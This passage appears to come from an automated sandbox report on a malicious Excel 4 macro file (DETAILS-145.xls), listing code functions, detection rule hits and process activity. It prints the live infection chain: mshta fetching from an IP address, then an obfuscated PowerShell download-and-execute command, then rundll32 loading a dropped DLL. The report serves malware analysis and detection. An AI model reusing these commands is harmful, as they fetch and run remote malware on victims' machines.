                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007874DD12_2_007874DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007804B812_2_007804B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078E49812_2_0078E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077EC9B12_2_0077EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078EE9412_2_0078EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078BE8C12_2_0078BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00791B5412_2_00791B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077F93D12_2_0077F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078351212_2_00783512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077970012_2_00779700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00778D9512_2_00778D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078B39112_2_0078B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00779A7D12_2_00779A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0079367212_2_00793672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078026B12_2_0078026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0079146E12_2_0079146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078686412_2_00786864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077E86A12_2_0077E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0079086712_2_00790867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077C85012_2_0077C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077865012_2_00778650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077CA4312_2_0077CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077E24312_2_0077E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078504012_2_00785040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078363D12_2_0078363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077283012_2_00772830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078183112_2_00781831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078A42912_2_0078A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078542E12_2_0078542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077B82112_2_0077B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00776C2912_2_00776C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078561F12_2_0078561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00776A1F12_2_00776A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077B41A12_2_0077B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007788F412_2_007788F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007864F112_2_007864F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007744FA12_2_007744FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00776ED612_2_00776ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007904DE12_2_007904DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007768DE12_2_007768DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078ACD312_2_0078ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078D8D712_2_0078D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078129C12_2_0078129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078109E12_2_0078109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077AE9A12_2_0077AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078CC8912_2_0078CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077608312_2_00776083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00788D7112_2_00788D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077777B12_2_0077777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077AB6612_2_0077AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00790D5B12_2_00790D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077F15412_2_0077F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077195012_2_00771950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078275312_2_00782753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078A15612_2_0078A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00784B5612_2_00784B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00783D4112_2_00783D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077194C12_2_0077194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077BB4B12_2_0077BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078094612_2_00780946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078FF3112_2_0078FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00780D3312_2_00780D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077472E12_2_0077472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077911A12_2_0077911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077BD0F12_2_0077BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077C30912_2_0077C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078EBFF12_2_0078EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00782BF612_2_00782BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078D3C812_2_0078D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00787BCA12_2_00787BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007845CD12_2_007845CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077CFCE12_2_0077CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00773FB812_2_00773FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078C9A912_2_0078C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007899AA12_2_007899AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00772FA112_2_00772FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007841A712_2_007841A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0079199312_2_00791993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00771F9B12_2_00771F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00777B8212_2_00777B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078C38F12_2_0078C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077F58F12_2_0077F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077FD8C12_2_0077FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078918612_2_00789186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00605CF914_2_00605CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F970014_2_005F9700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060686414_2_00606864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0061086714_2_00610867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060026B14_2_0060026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FC85014_2_005FC850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F865014_2_005F8650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0061146E14_2_0061146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0061367214_2_00613672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FCA4314_2_005FCA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FE24314_2_005FE243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060504014_2_00605040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F9A7D14_2_005F9A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FE86A14_2_005FE86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F6A1F14_2_005F6A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FB41A14_2_005FB41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060A42914_2_0060A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060542E14_2_0060542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060183114_2_00601831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060363D14_2_0060363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F283014_2_005F2830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F6C2914_2_005F6C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FB82114_2_005FB821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060561F14_2_0060561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F68DE14_2_005F68DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F6ED614_2_005F6ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_006064F114_2_006064F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F44FA14_2_005F44FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F88F414_2_005F88F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F70ED14_2_005F70ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060ACD314_2_0060ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060D8D714_2_0060D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_006074DD14_2_006074DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_006104DE14_2_006104DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FEC9B14_2_005FEC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FAE9A14_2_005FAE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_006004B814_2_006004B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F608314_2_005F6083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060CC8914_2_0060CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060BE8C14_2_0060BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060EE9414_2_0060EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060E49814_2_0060E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060129C14_2_0060129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060109E14_2_0060109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FF15414_2_005FF154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F195014_2_005F1950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00608D7114_2_00608D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F194C14_2_005F194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FBB4B14_2_005FBB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00603D4114_2_00603D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F777B14_2_005F777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060094614_2_00600946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060275314_2_00602753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00611B5414_2_00611B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060A15614_2_0060A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00604B5614_2_00604B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FAB6614_2_005FAB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00610D5B14_2_00610D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F911A14_2_005F911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FBD0F14_2_005FBD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060FF3114_2_0060FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00600D3314_2_00600D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FC30914_2_005FC309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FF93D14_2_005FF93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F472E14_2_005F472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060351214_2_00603512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FCFCE14_2_005FCFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00602BF614_2_00602BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060EBFF14_2_0060EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060D3C814_2_0060D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00607BCA14_2_00607BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_006045CD14_2_006045CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F1F9B14_2_005F1F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_006041A714_2_006041A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060C9A914_2_0060C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F8D9514_2_005F8D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_006099AA14_2_006099AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FF58F14_2_005FF58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005FFD8C14_2_005FFD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F7B8214_2_005F7B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060918614_2_00609186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F3FB814_2_005F3FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060C38F14_2_0060C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060B39114_2_0060B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0061199314_2_00611993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F2FA114_2_005F2FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001DEC9B15_2_001DEC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001EE49815_2_001EE498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001EEE9415_2_001EEE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001EBE8C15_2_001EBE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E04B815_2_001E04B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E74DD15_2_001E74DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E5CF915_2_001E5CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D70ED15_2_001D70ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E351215_2_001E3512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D970015_2_001D9700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001DF93D15_2_001DF93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001F1B5415_2_001F1B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D8D9515_2_001D8D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001EB39115_2_001EB391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E561F15_2_001E561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D6A1F15_2_001D6A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001DB41A15_2_001DB41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E363D15_2_001E363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D283015_2_001D2830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E183115_2_001E1831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E542E15_2_001E542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D6C2915_2_001D6C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001EA42915_2_001EA429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001DB82115_2_001DB821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001DC85015_2_001DC850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D865015_2_001D8650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001DCA4315_2_001DCA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E504015_2_001E5040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001DE24315_2_001DE243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D9A7D15_2_001D9A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001F367215_2_001F3672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001F146E15_2_001F146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E026B15_2_001E026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001DE86A15_2_001DE86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001F086715_2_001F0867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E686415_2_001E6864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E109E15_2_001E109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E129C15_2_001E129C
                            Source: 54C4.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: DETAILS-145.xlsMacro extractor: Sheet name: Macro1
                            Source: DETAILS-145.xlsMacro extractor: Sheet name: Macro1
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077C67D DeleteService,12_2_0077C67D
                            Source: DETAILS-145.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: DETAILS-145.xls, type: SAMPLEMatched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPEDMatched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Wlnljconerohcjaz\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: DETAILS-145.xlsOLE indicator, VBA macros: true
                            Source: DETAILS-145.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@29/9@2/36
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: DETAILS-145.xlsOLE indicator, Workbook stream: true
                            Source: DETAILS-145.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: DETAILS-145.xlsReversingLabs: Detection: 34%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........q.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....................................}..v.....^......0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k..... ..............................}..v....(_......0.................q.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................g..k....................................}..v....`k......0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................g..k......q.............................}..v.....k......0...............(.q.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............7..k....................................}..v............0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............7..k....X.q.............................}..v............0.................q.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'..................k....E...............................}..v....H8......0.................q.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+..................k....E...............................}..v.....v......0.................q.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0.......................:.......................Jump to behavior
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi
